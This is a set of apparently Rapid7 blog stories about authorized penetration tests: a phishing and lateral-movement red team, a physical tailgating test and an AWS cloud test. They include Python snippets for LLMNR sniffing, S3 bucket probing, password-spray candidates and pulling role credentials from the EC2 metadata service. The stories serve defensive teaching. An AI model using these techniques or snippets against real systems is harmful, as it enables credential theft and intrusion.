After initial reconnaissance, we determined three possible points of entry: compromise one of the API endpoints, phish a user with a payload or MFA bypass, or guess a password and hope it could sign into something without MFA required. We spent the next two days combing over the customer's product API documentation and testing for any endpoints that could be accessed without authentication or exploited to gain useful information. We were stonewalled here — kudos to the company.

Gone Phishin’

Our optimism and excitement was still high, however, as we set our eyes on plan B, phishing employees. We whipped up a basic phishing campaign that masqueraded as a new third-party employee compliance training portal. To bypass web content filtering, we purchased a recently expired domain that was categorized as “information/technology.” We then created a fake landing page with our new company logo and a “sign in with SSO” button.

Little did the employees realize that while they saw their normal Okta login page, it was actually a proxy phishing page built with Evilginx that captured their credentials and authenticated Okta session. The only noticeable difference was the URL. After capturing an employee's Okta session, we redirected them back to our fake third-party compliance platform, where they were asked to download an HTML Application (HTA) file containing our payload.

We fired off this phishing campaign to 50 employee email addresses discovered online, ensuring that anyone with "information security" in their title was removed from the target list. Then we waited. One hour went by. Two. Three. No interactions with the campaign. The dread was starting to set in. We suspected that a day of hard work to build the entire campaign had been eaten by a spam filter, or worse, identified, with the domain instantly blocked.

With defeat looming, we began preparing a second phishing campaign, when all of a sudden our TMUX session running Evilginx showed a blob of green text. A valid credential had been captured, as well as an Okta session token. We held our breath as we switched to our Command and Control (C2) server dashboard, fingers crossed, and there it was: a callback from the phished user's workstation. They had opened the HTA on their workstation. It bypassed the EDR solution and executed our payload. We were in.

The thrill of establishing initial access is exhilarating. However, it's at this moment that we have to take a deep breath and focus. Initial access by phishing is a fragile thing: if the user reports it, we'll lose our shell. If we trip an alert within the EDR, we'll lose our shell. If the user goes home for the night and restarts their computer before we can set persistence, we'll lose our shell.

First things first, we quickly replaced our HTA payload on the phishing page with something benign in case the campaign was reported and the Security Operations Center (SOC) triaged the landing page. We couldn't have them pulling Indicators of Compromise (IoCs) out of our payload and associating it with our initial access host in their environment. From here, one operator focused on setting persistence and identifying a lateral movement path while the other used the stolen Okta session tokens to review the user's cloud applications before they expired. Three hours in, we still had access, reconnaissance was underway, and we had identified a few juicy Kerberoastable service accounts that, if cracked, would allow lateral movement.

Things were going our way. And then it all came crashing down.

At what felt like a crescendo of success, we received another successful phish with credentials. We cracked the service account password that we had Kerberoasted, and… lost our initial access shell. Looking in the employee's Teams messages, we saw messages from the SOC asking about suspicious activity on their asset as they prepared to quarantine it. Deflated and tired, back to the drawing board we went. But, like all rollercoasters, we started going back uphill when we realized the most recent credentials captured were for an intern on the help desk team. While a tier-one help desk employee didn't have much access in the company, they could view all available employee support tickets in the SaaS ticketing solution. Smiling ear to ear, we assumed our role as the helpful company IT help desk.

Hi, We’re Here to Help

We quickly crafted a payload that paired legitimate Microsoft binaries with our malicious DLL, loaded via AppDomain injection, and packaged it all nicely into an ISO. We then identified an employee who had submitted a ticket to the help desk asking for assistance with connecting to an internal application that was throwing an error. Taking a deep breath, we spoofed the help desk phone number and called the employee in need of assistance.

“Hi ma’am, this is Arthur from the IT help desk. We received your ticket regarding not being able to connect to the portal, and would like to troubleshoot it with you. Is this a good time?”

Note: you might be wondering what the employee could have done better here, but in the end, the responsibility lay with the company for not requiring multi-factor authentication on their help desk portal. It gave us the information we needed to answer, as the help desk, any question the employee could ask.

The employee was thrilled to get assistance so quickly from the help desk. We even went the extra mile and spent time trying to troubleshoot the actual issue with the employee, receiving thanks for our efforts. Finally, we asked the employee to try applying “one last update” that may resolve the issue. We directed them to go to a website hosting our payload, download the ISO, open it, and run the “installer.” They obliged, as we had already built rapport throughout the entire call. Moments later, we had a shell on the employee’s workstation.

With a shell, cracked service account credentials, and all the noisy reconnaissance out of the way from our first shell, we dove right into lateral movement. The service account allowed us to access an MSSQL server as an admin. We mounted the C$ drive of the server and identified already-installed programs which utilized Microsoft's .NET framework. We uploaded a malicious DLL and configuration file and remotely executed the installed program using Windows Management Instrumentation (WMI), again utilizing AppDomain injection to load our DLL. Success! We received a callback to our new C2 domain from the MSSQL server. Lateral movement hop number one, complete.

Using Rubeus, we checked for Kerberos tickets in memory and discovered a Ticket Granting Ticket (TGT) cached for a Domain Admin user. The TGT could be used in a Pass-the-Ticket (PTT) attack to authenticate as the account, which meant we had Domain Admin access until the ticket expired in approximately four more hours. Everything was flowing and we were ready for our next setback. But it didn't come. Instead, we used the ticket to authenticate to the workstation of a cloud administrator and establish yet another shell on the host. Luckily for us, the company had everyone's roles and titles in their Active Directory descriptions, and employee workstations also contained the associated employee name in the description field, which made identifying the cloud admin's workstation a breeze.

Using our shell on the cloud administrator’s workstation, we executed our own Chrome cookie extractor, “HomemadeChocolateChips,” in memory, which spawned Chrome with a debug port and extracted all cookies from the current user’s profile. This provided us with an Okta session token, which we used in conjunction with a SOCKS proxy through the employee’s machine to access their Okta dashboard sourced from an internal IP address. The company had it configured such that once authenticated to Okta, if coming from the company’s IP space, the Azure Okta chiclet did not prompt for MFA again. With a squeal of excitement, we were into their Azure Portal with admin privileges.

In Azure, there is a handy feature under a virtual machine's configuration and operations tab called "Run Command." This allows an administrator to do just as it states: run a PowerShell script on the virtual machine. As if it couldn't get any easier, we identified a virtual machine labeled "Jenkins Build Server" with "Run Command" enabled. After running a quick PowerShell script to download our zip file with backdoored legitimate binaries, expand the archive, and then execute them, we established a C2 foothold on the build server. From there, we found GitHub credentials utilized by build jobs, which let us access our objective: source code for the company's applications.

Exhausted but triumphant, with bags under our eyes and shaking from the caffeine-induced energy, we set up a few long-haul C2 connections to maintain persistent network access through the end of the assessment. We also met with the client to determine next steps, such as intentionally alerting their security team to the breach. Well, after a good beer and a nap over the weekend, that is.

The preceding story was an amalgamation of several recent attack workflows to obfuscate client identity and showcase one cohesive assessment.

PenTales: A Badge, a Tag, and a Bunch of Unattended Chemicals; Why Physical Social Engineering Engagements are an Important Part of Security

At Rapid7 we love a good pen test story. So often they show the cleverness, skill, resilience, and dedication to our customer’s security that can only come from actively trying to break it! In this series, we’re going to share some of our favorite tales from the pen test desk and hopefully highlight some ways you can improve your own organization’s security.

Rapid7 was tasked with performing a physical social engineering engagement for a pharmaceutical company. Physical social engineering penetration tests involve actually entering the physical space of the target. In this case, we were able to enter the facility via tailgating behind an unsuspecting employee.

After gaining access inside the client's office space, I traversed multiple floors without having a valid RFID badge, thanks to even more tailgating and unsuspecting employees. When I reached an unattended conference room, I was able to plug a laptop into the network due to a lack of network access controls. I employed a tool called 'Responder.py' to perform Man-in-the-Middle (MitM) attacks by poisoning LLMNR/NBNS requests. This allowed me to gather usernames and password hashes for multiple employees, as well as perform 'relay' attacks. The password hashes were then placed on a password cracking server, and I let the cracking attempts run for a while as I exited the conference room to identify additional points of interest for the assessment. I was able to exit the building that first day without ever being stopped or questioned by anyone.
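Responder automates the poisoning half of this attack, answering LLMNR/NBNS broadcasts with its own address so victims hand over authentication attempts. As a rough illustration of what the tool listens for (not a substitute for it), here is a minimal Python sketch that joins the LLMNR multicast group and decodes the hostname each query asks about; LLMNR reuses the DNS message format, so parsing is a matter of walking length-prefixed labels.

```python
import socket
import struct

LLMNR_GROUP = "224.0.0.252"  # IPv4 multicast address LLMNR queries are sent to
LLMNR_PORT = 5355

def parse_llmnr_query(data: bytes) -> str:
    """Extract the queried hostname from a DNS-format LLMNR packet."""
    if len(data) < 13:
        raise ValueError("packet too short")
    labels, offset = [], 12  # skip the 12-byte DNS-style header
    while data[offset] != 0:  # QNAME is a series of length-prefixed labels
        length = data[offset]
        labels.append(data[offset + 1:offset + 1 + length].decode("ascii", "replace"))
        offset += 1 + length
    return ".".join(labels)

def watch_llmnr() -> None:
    """Join the multicast group and log who is asking for which names."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    sock.bind(("", LLMNR_PORT))
    mreq = struct.pack("4s4s", socket.inet_aton(LLMNR_GROUP),
                       socket.inet_aton("0.0.0.0"))
    sock.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)
    while True:
        data, addr = sock.recvfrom(1024)
        print(f"{addr[0]} is looking for {parse_llmnr_query(data)!r}")
```

Watching which names go unanswered on your own network this way is also a cheap defensive check: the typos and stale shares that generate those broadcasts are exactly what makes poisoning viable.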

Upon my return the following day, I again tailgated into the facility and returned to the same conference room to check the status of the password cracking attempts, only to discover that none of the hashes had cracked. Obviously, with more time and additional password cracking attempts, the results might have been different. Having been unsuccessful at this first attempt, I looked around for other 'quick wins' such as missing critical patches, but was unable to discover any attack paths that way.

While performing network testing, I noticed an employee hovering around outside the conference room door, only to quickly disappear after being seen. I continued testing for another few minutes before noticing the same employee nearby. While I was unable to ascertain the reason for this employee's presence, to avoid blowing my cover I packed up my equipment and exited the conference room to focus on other goals that were prioritized over network testing.

Entering the Laboratory

Part of our task from the client was to see if I could gain access to multiple biology labs that stored several dangerous chemicals as well as expensive testing equipment. Turns out, it wasn't terribly difficult. The first lab was completely unattended, and I was able to enter thanks to a door that was not fully closed. The second lab was accessed compliments of a significant gap between the door's plunger and strike plate, which allowed me to use my hotel room key to shim the door open. This gave me access to more dangerous (and dangerously unattended) chemicals. I then accessed the 5th floor labs through even more tailgating and unsuspecting employees. The 5th floor labs actually had people in them, but nobody stopped and questioned me, a complete stranger. This pen test really highlights the benefits of Security Awareness Training and physical social engineering engagements!

The Boss’ Office

The final demonstration of impact came when the point-of-contact for the engagement asked if we could enter at least one of a few executives' offices and leave a message on their dry erase board stating ‘I was here - A Pentester.’ After a little while, I got my chance to tag an executive’s office to really help demonstrate the impact/importance of security of all kinds, not just your network.

While making our way through our client's office spaces on the last day, I was finally stopped and questioned. I informed this gentleman that I was working with [Point-of-Contact's Name] performing a wireless survey of their networks. He told me that he knew I worked for their company because I had a badge. Their badges did not contain a picture or any other identifying information; they were totally blank. My badge was blank too (Pro Tip: don't assume someone works there based on a blank RFID badge). I told this fella that it was good that he stopped and questioned me, because you never know who somebody is or if they are who they say they are. He completely agreed, shook my hand, and told me to have a nice day.

Few things highlight the need for robust employee security training more than a successful physical social engineering pen test. Ensuring your workforce is thinking critically about security goes beyond the ability to sniff out a phishing email and into securing the physical space they occupy. A good security plan is essential lest you be visited by a clandestine attacker.

Check us out at this year's Black Hat USA in Las Vegas! Our experts will be giving talks and our booth will be staffed with many members of our team. Stop by and say hi.

PenTales: There Are Many Ways to Infiltrate the Cloud

At Rapid7 we love a good pen test story. So often they show the cleverness, skill, resilience, and dedication to our customer’s security that can only come from actively trying to break it! In this series, we’re going to share some of our favorite tales from the pen test desk and hopefully highlight some ways you can improve your own organization’s security.

Rapid7 was engaged to do an AWS cloud ecosystem pentest for a large insurance group. The test included looking at internal and external assets, the AWS cloud platform itself, and a configuration scan of their AWS infrastructure to uncover gaps based on NIST’s best practices guide.

I evaluated their external assets, but most of the IPs were configured to block unauthorized access. I continued to test but did not gain access to any of the external assets since, in the cloud, once access has been blocked at the platform level, there is not much an external attacker can do about it. Nevertheless, I continued to probe for cloud resources, namely S3 buckets, AWS apps, etc., using company-based keywords. For example: companyx, companyx.IT, companyx.media, etc. Eventually, I found S3 buckets that were publicly available on their external network. These buckets contained sensitive information, which was definitely a point of action for the client.
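The keyword probing described above can be sketched in a few lines of Python. This is a simplified illustration rather than the tooling used on the engagement: the suffix list is an assumption, and the status-code interpretation reflects how S3 distinguishes unclaimed names (404, NoSuchBucket) from buckets that exist but are private (403) or publicly listable (200).

```python
import urllib.error
import urllib.request

def candidate_buckets(company, keywords=("it", "media", "dev", "backup", "logs")):
    """Generate plausible S3 bucket names from a company name and common suffixes."""
    names = [company]
    for kw in keywords:
        for sep in (".", "-", ""):
            names.append(f"{company}{sep}{kw}")
    return names

def bucket_url(name):
    # Virtual-hosted-style S3 URL for probing a candidate bucket name
    return f"https://{name}.s3.amazonaws.com/"

def bucket_exists(name):
    """Probe one candidate; True/False where determinable, None on network failure."""
    try:
        urllib.request.urlopen(bucket_url(name), timeout=5)
        return True            # 200: bucket exists and its listing is public
    except urllib.error.HTTPError as e:
        return e.code != 404   # 403: exists but private; 404: no such bucket
    except urllib.error.URLError:
        return None
```

For example, `candidate_buckets("companyx")` yields names like companyx.it and companyx-media, matching the keyword pattern used on the test.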

My next step was to complete a configuration scan of their AWS network, which provided complete visibility into their cloud infrastructure, including the resources that were running, the roles attached to those resources, the open services, and so on. It also gave the customer valuable insight into the security controls that were missing per NIST's best practices guide: unused access keys, unencrypted disk volumes, keys not rotated every 90 days, insufficient logging, publicly accessible services like SSH and RDP, and many more. This scan was done using Rapid7's own InsightCloudSec tool, which provides customers visibility into their cloud network and helps them identify gaps.

When testing the AWS cloud platform with the read-only credentials provided by the customer, I found they were locked down with a strong IAM policy that allowed viewing only the cloud resources on the platform. My attempts to enumerate weaknesses in the IAM policy turned up nothing. This will be important later on!

Hardcoded credentials were found in function apps and EC2 instance data, but I was unable to leverage them to escalate privileges. Enumerating the S3 buckets with the read-only credentials turned up multiple buckets containing customer invoices and payment data, along with Infrastructure-as-Code files, which revealed how the customer managed their automated deployments. Beyond this, we were unable to find any vulnerabilities to escalate privileges; however, all the data accumulated during this phase was kept handy in case there was a chance to chain findings together and gain access during the next phases of the pentest. Although it was frustrating not to find any way to escalate privileges from the platform itself, enumerating it gave me plenty of understanding of their environment, which would prove useful in the next phase.

In the final phase of the test, I tested all of the internal assets that were in scope. These were primarily Windows servers on EC2 instances hosting different kinds of services and applications. I enumerated the Active Directory domain controllers on these servers and found that some AD servers allowed NULL session enumeration, which means you could connect to the AD server and dump out all of the domain information, like users, groups, and password policies, without authentication.

Password spray attacks were deployed after all the users in the domain were enumerated. Pretty quickly, it was clear there were multiple users with weak passwords like Summer2023, Winter23, or Password1. Many accounts were even sharing the same passwords! This provided plenty of compromised credentials, allowing me to work through the access levels granted to these compromised accounts. I found one account with Domain Admin access and dumped the NTDS.dit file from the AD servers, which contained hashes for all the domain users. With this, several more accounts with weak passwords were cracked.
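The candidate list for a spray like this practically writes itself. Below is an illustrative sketch of the season/year generator behind guesses like Summer2023 and Winter23; the suffix choices are assumptions, and a real spray would also throttle attempts per account to stay under lockout thresholds.

```python
from datetime import date

def seasonal_passwords(year=None):
    """Build the weak season/year candidates that password sprays catch so often."""
    year = year or date.today().year
    candidates = []
    for y in (year, year - 1):
        for season in ("Spring", "Summer", "Autumn", "Fall", "Winter"):
            for suffix in ("", "!", "@"):
                candidates.append(f"{season}{y}{suffix}")        # e.g. Summer2023
                candidates.append(f"{season}{y % 100}{suffix}")  # e.g. Winter23
    candidates.append("Password1")  # perennial favorite
    return candidates
```

Running the same generator against cracked NTDS.dit hashes offline is a quick way for defenders to measure how much of their own workforce a spray would catch.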

With access to multiple accounts in the bag, the only goal left was to gain some sort of access on the AWS platform. With all the data gathered from the AWS cloud platform test, I first looked at the EC2 instances on the platform and which roles were assigned to each of them. Then I assessed accounts that had admin access. I found an 'xx-main-ec2-prod' role attached to an EC2 instance to which I had admin access through one of the compromised accounts. Using RDP to log in to the EC2 instance, I queried the EC2 instance metadata service and got the temporary AWS credentials for the 'xx-main-ec2-prod' role.
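Retrieving role credentials this way relies on the EC2 instance metadata service, which is reachable only from the instance itself at the link-local address 169.254.169.254. A sketch of the documented IMDSv2 flow is below; the role name is taken from the story, and the fetch itself only works when run on an actual EC2 instance:

```python
import json
import urllib.request

IMDS = "http://169.254.169.254/latest"  # link-local: reachable only on the instance

def credentials_url(role):
    """Metadata path that returns the temporary keys for an instance role."""
    return f"{IMDS}/meta-data/iam/security-credentials/{role}"

def role_credentials(role, timeout=2.0):
    """Fetch temporary credentials for an instance role via IMDSv2."""
    # IMDSv2 first requires a short-lived session token, obtained with a PUT
    req = urllib.request.Request(
        f"{IMDS}/api/token", method="PUT",
        headers={"X-aws-ec2-metadata-token-ttl-seconds": "300"})
    token = urllib.request.urlopen(req, timeout=timeout).read().decode()
    req = urllib.request.Request(
        credentials_url(role),
        headers={"X-aws-ec2-metadata-token": token})
    # The JSON response carries AccessKeyId, SecretAccessKey, and Token fields
    return json.loads(urllib.request.urlopen(req, timeout=timeout).read())
```

Requiring IMDSv2 (and its token round-trip) instance-wide is also the standard hardening step against this exact credential-theft path.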

With these credentials, I created a new AWS profile and enumerated the permissions associated with the role. The 'xx-main-ec2-prod' role had access to list secrets in the AWS account, put and delete objects in all S3 buckets, send OS commands to all EC2 instances in the account, and modify logs as well. I proceeded to list some secrets in the AWS account to confirm the access we had gained. With this level of access, I was able to show the client how an attacker could escalate privileges on their AWS platform.

In the end, this testing highlights how vast the attack surface of a cloud network can be. Even if you've locked down your cloud platform, the infrastructure assets can still be vulnerable, allowing attackers to compromise them and then move laterally into the cloud network. As organizations move their networks to the cloud, it is important not to simply depend on the cloud platform to secure the network, but also to ensure that individual assets are continuously tested and secured.
